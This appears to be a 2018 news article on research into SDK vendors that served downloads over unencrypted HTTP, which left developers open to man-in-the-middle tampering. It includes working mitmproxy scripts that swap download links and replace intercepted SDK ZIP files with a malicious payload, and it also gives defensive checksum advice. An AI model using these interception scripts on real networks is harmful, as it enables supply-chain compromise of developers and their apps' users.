
This article was published on February 15, 2018

Want to hack a million iPhones? Target SDKs, finds security researcher

John Donne once said, “no man is an island.” If he lived in the 21st century, he might have said the same thing about software. Programs which, on the face of it, appear to be completely distinct entities, actually consist of dozens of other components made by other developers and companies.

There are millions of third-party libraries and software development kits (SDKs) on the Internet. Developers download them and integrate them into their software, thereby saving them time when building features and functionality. There’s no need to reinvent the wheel for each thing they want to do.

But are they also a security Achilles heel? Bay Area security expert Felix Krause examined several of the most popular SDKs, and found many lacked transport-layer security. Or, to put it in plainer terms, they were being served in an insecure fashion, allowing a malicious third party to intercept and modify their contents.

Your app is grass

Before we go any further, I want to say that Krause’s research is platform-agnostic. It affects software of all stripes. Windows. Linux. MacOS. Android. iOS. Amiga too, probably.

That said, in this section, I’m going to talk about iOS apps, because the platform is familiar to most people and because it makes for a particularly interesting case study. It also happens to be Krause’s major area of interest, and the platform on which he’s based much of his research.

Let’s suppose you want to infect a million iPhone users with malware. I don’t know why, but you do. It’s a tricky proposition. For starters, Apple’s locked down iOS tighter than Fort Knox. Grabbing an iOS zero day is a non-starter, too; those start in the six-to-seven figure range.

So, as a last resort, you sneak a compromised SDK to a developer, who then unwittingly builds the dodgy code into their app (we’ll talk about how this works later). You then get the keys to the kingdom, more or less. Although Apple’s killjoy sandboxing stops the real fun, the malicious code can still access:

  • Any files and folders the app has access to
  • Any permissions the app has access to (hello, microphone and location services!)
  • The iCloud container belonging to the app
  • All Keychain data the app has access to
  • All information exchanged between the application and a remote server

Yikes. In short, you could turn an ostensibly legitimate application into an Orwellian spying machine that records every tap and keypress made within it. It could even record where the user has been. And it could harvest credentials, which could be sold to other bad actors.

And it all happens at an unimaginable scale. A single compromised SDK might find its way into hundreds of apps, each of which in turn ensnares thousands of users.

How this works

Man-in-the-middle attacks are nothing new. This research isn’t about them, but rather about how important pieces of software are transported, and how that affects the broader software security ecosystem. It’s important to touch on how this attack works, however.

This attack requires a third party to position themselves either between a developer’s computer and the rest of the network, or between the network and the server providing SDK downloads. This allows them to observe and modify traffic as it travels from the computer to the outside world. The finer technical details can be read on Krause’s blog, if you’re curious.

The victim could be anywhere: at a hotel, a cafe, or an airport. It doesn’t matter. Once the attacker is positioned, they can start serving bogus SDKs. Krause pointed out that it’s trivial to replace text in an HTML document. So, they could change the link location on a download page to one that points elsewhere.

An example given by Krause explores changing the location of Localytics’ SDK to one that’s visually similar, and unlikely to arouse suspicion. See if you can spot the difference:

  • https://s3.amazonaws.com/localytics-sdk/sdk.zip
  • https://s3.amazonaws.com/localytics-sdk-binaries/sdk.zip

The former is the legitimate SDK, while the one containing “localytics-sdk-binaries” serves the malicious code.
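To see just how little effort this takes, here’s a minimal sketch of the kind of link rewriting an attacker could perform once positioned on the network. It’s written against mitmproxy’s Python addon API purely for illustration; it isn’t Krause’s actual proof-of-concept, and the bucket names are simply the ones from the example above:

    # rewrite_link.py (run with: mitmdump -s rewrite_link.py)
    from mitmproxy import http

    # URLs taken from the illustrative example above
    LEGIT = "https://s3.amazonaws.com/localytics-sdk/sdk.zip"
    SWAPPED = "https://s3.amazonaws.com/localytics-sdk-binaries/sdk.zip"

    def response(flow: http.HTTPFlow) -> None:
        # Only touch unencrypted HTML pages passing through the proxy,
        # and swap the download link before the page reaches the victim.
        content_type = flow.response.headers.get("content-type", "")
        if "text/html" in content_type:
            flow.response.text = flow.response.text.replace(LEGIT, SWAPPED)

The point isn’t the specific tool: anyone who can see and modify plain-HTTP traffic can make this kind of substitution, and the victim’s browser will render the tampered page as if nothing happened.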

Krause has also created a proof-of-concept that allows him to switch the contents of ZIP files and binaries in real time. This works by downgrading traffic from encrypted HTTPS to unprotected HTTP, using a tool called sslstrip. Step by step, here’s how it works (a rough sketch follows the list):

  • The attacker downloads an SDK
  • They then modify it, inserting their own malicious code
  • The attacker compresses the modified SDK back into a ZIP file
  • The attacker watches the network traffic and waits for a developer to download an SDK
  • They then replace any ZIP file matching a certain pattern with their own payload
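For the final two steps, something along these lines would do the job. Again, this uses mitmproxy’s addon API for illustration rather than Krause’s own tooling; “payload.zip” is a hypothetical pre-prepared archive, and the trick only works against downloads travelling over plain (or sslstrip-downgraded) HTTP:

    # swap_zip.py (run with: mitmdump -s swap_zip.py)
    from mitmproxy import http

    # Hypothetical payload: the legitimate SDK, re-archived with malicious code added
    with open("payload.zip", "rb") as f:
        PAYLOAD = f.read()

    def response(flow: http.HTTPFlow) -> None:
        # Wait for a download whose URL matches the targeted pattern,
        # then replace the response body with the attacker's archive.
        if flow.request.pretty_url.endswith("sdk.zip"):
            flow.response.content = PAYLOAD

From the developer’s point of view, the download completes normally; nothing on the wire hints that the archive has been swapped.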

Vendors are serving insecure SDKs

The avenue of attack highlighted by Krause’s research is a threat because of one thing: vendors are serving SDKs in a wholly insecure fashion.

Krause looked at 41 of the most popular SDKs. Thirteen of these were potentially vulnerable to a man-in-the-middle attack, while five offered no way to securely download the SDK at all. Many of these belong to big-name tech companies.

Take Amazon (which, to its credit, fixed the problem within three working days), for example. The Seattle-based tech titan served its AWS (Amazon Web Services) SDK downloads over ultra-insecure HTTP.

Another major SDK provider, Localytics (which has also resolved the problem), had an unencrypted documentation sub-site, which linked to its SDK. An attacker could have intercepted this and replaced the link to a malicious substitute, as mentioned earlier.

In line with responsible disclosure practice, Krause gave the affected SDK vendors a meaningful opportunity to resolve the issue before going public. He contacted the relevant stakeholders within each organization, and gave them three months to fix the issue to his satisfaction.

The issue is remarkably trivial to fix. Unlike many vulnerabilities, which require weeks’ worth of legwork, vendors only need to ensure their SDKs are downloaded through encrypted channels.
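On the developer’s side of the equation, the belt-and-braces equivalent is to fetch the SDK over HTTPS and check its hash against a checksum the vendor publishes over a secure channel. Here’s a minimal sketch in Python; the URL and checksum below are placeholders, not any real vendor’s values:

    import hashlib
    import requests  # third-party HTTP library; verifies TLS certificates by default

    # Placeholder values; a vendor would publish both over HTTPS
    SDK_URL = "https://sdk.example-vendor.com/sdk.zip"
    EXPECTED_SHA256 = "<vendor-published checksum>"

    resp = requests.get(SDK_URL, timeout=60)
    resp.raise_for_status()

    digest = hashlib.sha256(resp.content).hexdigest()
    if digest != EXPECTED_SHA256:
        raise SystemExit("Checksum mismatch: refusing to use the download")

    with open("sdk.zip", "wb") as f:
        f.write(resp.content)

Neither step is exotic: HTTPS stops the tampering described above, and a published checksum lets a developer catch a swapped archive even if the download itself has been compromised somewhere along the way.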

Depressingly, however, most vendors have failed to take meaningful action. Five days before the publication of this article, Krause wrote to me and told me that nearly two-thirds of the affected SDK providers had still not protected their SDK downloads. He said:

I just went through the list and checked if the SDK providers fixed their sites:

I notified all affected in November and December 2017, giving them enough time to resolve the issue before publicly blogging about it. Out of the 13 affected SDKs, 1 resolved the issue within three business days, 4 resolved the issue within a month, and 8 SDKs are still vulnerable to this attack at the time of publishing this post. The SDK providers that are still affected haven’t responded to my emails, or just replied with “We’re gonna look into this” – all of them in the top 50 most-used SDKs.

Which is shocking.

The software food chain

Think about a piece of steak you might buy in a supermarket. You purchase it with the assumption that it’s safe to eat. For that to work, it needs to have been handled properly at each stage of production. From farm to fork, everyone needs to do their job properly.

Software is a bit like that. The end user purchases a piece of software from their supermarket (in this scenario, the App Store) with the assumption that it won’t harm them. But for that assumption to hold, everyone in the chain needs to adhere to security best practices, not just app developers.
